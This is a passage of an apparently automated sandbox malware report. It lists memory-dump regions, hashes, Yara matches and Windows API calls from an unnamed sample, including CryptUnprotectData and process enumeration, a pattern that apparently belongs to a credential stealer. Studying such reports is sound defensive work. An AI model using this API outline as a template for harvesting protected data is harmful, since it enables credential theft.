                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: !~ns$=?]$OQ}m$OQ}m$q#\~
                              • API String ID: 0-106341672
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: \u$\u${${$}$}
                              • API String ID: 0-582841131
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 004CC971
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 004CC97C
                              • lstrcat.KERNEL32(?,004E0B47), ref: 004CCA43
                              • lstrcat.KERNEL32(?,004E0B4B), ref: 004CCA57
                              • lstrcat.KERNEL32(?,004E0B4E), ref: 004CCA78
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 004C72AD
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C72B4
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004C72E1
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 004C7304
                              • LocalFree.KERNEL32(?), ref: 004C730E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004D97AE
                              • Process32First.KERNEL32(004E0ACE,00000128), ref: 004D97C2
                              • Process32Next.KERNEL32(004E0ACE,00000128), ref: 004D97D7
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 004D97EC
                              • CloseHandle.KERNEL32(004E0ACE), ref: 004D980A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: <7\h$huzx
                              • API String ID: 0-2989614873
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: !M<$WV|t$%lo$il0
                              • API String ID: 0-948028024
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: .)Ml$:-|+$IAnw$]J{W
                              • API String ID: 0-1110005669
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,004C51D4,40000001,00000000,00000000,?,004C51D4), ref: 004D9050
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,004E0DE8,00000000,?), ref: 004D7B40
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004D7B47
                              • GetLocalTime.KERNEL32(?,?,?,?,?,004E0DE8,00000000,?), ref: 004D7B54
                              • wsprintfA.USER32 ref: 004D7B83
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,012AE428,00000000,?,004E0DF8,00000000,?,00000000,00000000), ref: 004D7BF3
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004D7BFA
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,012AE428,00000000,?,004E0DF8,00000000,?,00000000,00000000,?), ref: 004D7C0D
                              • wsprintfA.USER32 ref: 004D7C47
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 'h|j$U_$iwo
                              • API String ID: 0-979665361
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: #k^y$Zj;?$Do}
                              • API String ID: 0-842040153
                              APIs
                              • CoCreateInstance.COMBASE(004DE120,00000000,00000001,004DE110,00000000), ref: 004D39A8
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004D3A00
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004CA2D4
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 004CA2F3
                              • LocalFree.KERNEL32(?), ref: 004CA323
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ?$__ZN
                              • API String ID: 0-1427190319
                              • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                              • Instruction ID: fae67c8cbd00298a82c96578366560efe4c9160d4128d30e15dc0adf3e3ffa54
                              • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                              • Instruction Fuzzy Hash: 307202B2908B519BD714CE24C89066ABFE2FFC5310F598A1DF9E55B291E370EC41DB82
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 3]O\$r&_
                              • API String ID: 0-1283433572
                              • Opcode ID: eddfe8c35a4d101841dbe3b62ba0d1fda5344be681d57acbb37923ca595bab90
                              • Instruction ID: ce7b41104dd12fb0885df76d63f8313482c206133f340759d54e74b8ede6a707
                              • Opcode Fuzzy Hash: eddfe8c35a4d101841dbe3b62ba0d1fda5344be681d57acbb37923ca595bab90
                              • Instruction Fuzzy Hash: 4D413AF3A093005BF7082D3DDD9577AB7D1EBD4320F1A813DDB8147788E97908014296
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: xn--
                              • API String ID: 0-2826155999
                              • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                              • Instruction ID: d6fd0f4dc0b55815afe74b91aa9d989d6e2066c03cfba384f516e0ebdb177b40
                              • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                              • Instruction Fuzzy Hash: 0BA200B1C042688AFF29CB68C8947EDBFB1BF49300F1842AAD4567B281D7759EC5CB51
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv
                              • String ID:
                              • API String ID: 3732870572-0
                              • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                              • Instruction ID: dc93503459663bde19ccbda6062dbd6553c00612acbf15aee3b7c981951f4eb7
                              • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                              • Instruction Fuzzy Hash: EEE1BF316083419FE725DE28C8817EEBBE6BFC9300F554A2DE5D997391E7319885CB82
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv
                              • String ID:
                              • API String ID: 3732870572-0
                              • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                              • Instruction ID: 82694097c304cf9f4b330dc49296db4d3e2666dcafe4890b426d6bce2c24e212
                              • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                              • Instruction Fuzzy Hash: 53E1A231A083059FEB24CE18C8917EEBBE6FFC5310F15992DE9999B251D730AC85CB46
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: UNC\
                              • API String ID: 0-505053535
                              • Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                              • Instruction ID: 6bba45419465814afec65266fad06965b17b5da141346fe8a669809654e32c0f
                              • Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                              • Instruction Fuzzy Hash: 89E11671D042758EEF10CF18D8867BEBFE2BF97318F198169C4A46B2D2C73599468B90
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 8Up
                              • API String ID: 0-3899141458
                              • Opcode ID: 9703654c58a6c31b80eae9d5dea8642b88e566d1a5ec7ee4c96f6f58c0dc6396
                              • Instruction ID: 4bd60ae256c5e19ee00384cd828cee80af5b946da40eee3742f55e5a550f3ca6
                              • Opcode Fuzzy Hash: 9703654c58a6c31b80eae9d5dea8642b88e566d1a5ec7ee4c96f6f58c0dc6396
                              • Instruction Fuzzy Hash: D4715AF3A083145BE3186D3DEC8577BBBDAEBD4320F16463DDE8493781E97A48054286
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: .WeG
                              • API String ID: 0-4167595253
                              • Opcode ID: bb204fcd1639b2e80245576e23b44c03f7d3022d286483273257091025c9a22e
                              • Instruction ID: c371452e2efc927bfc6791cf42b2aa5b48cf7a35b29b0e88321419e74029b71b
                              • Opcode Fuzzy Hash: bb204fcd1639b2e80245576e23b44c03f7d3022d286483273257091025c9a22e
                              • Instruction Fuzzy Hash: 314126B3A046006BF3049929DC4577BB7E69FD8330F2AC63DA698D3784E5799C058296
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                              • Instruction ID: 97012c10e0fc407ef06887de0475756721562da7c4e95c66f7e3d9254dc8c28c
                              • Opcode Fuzzy Hash: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                              • Instruction Fuzzy Hash: C782E075900F448FD765CF2AC8807A2B7E1BF9A300F548A2ED9EA87751DB34B945CB50
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                              • Instruction ID: 65ef96a8725fd827292f66b909b952c908f7b4f26aeb0627dbf769edc1979d81
                              • Opcode Fuzzy Hash: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                              • Instruction Fuzzy Hash: 9842AE706047418FC725CF19C49466AFFE2BF99310F288A6ED4868B7DBD636E885CB50
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
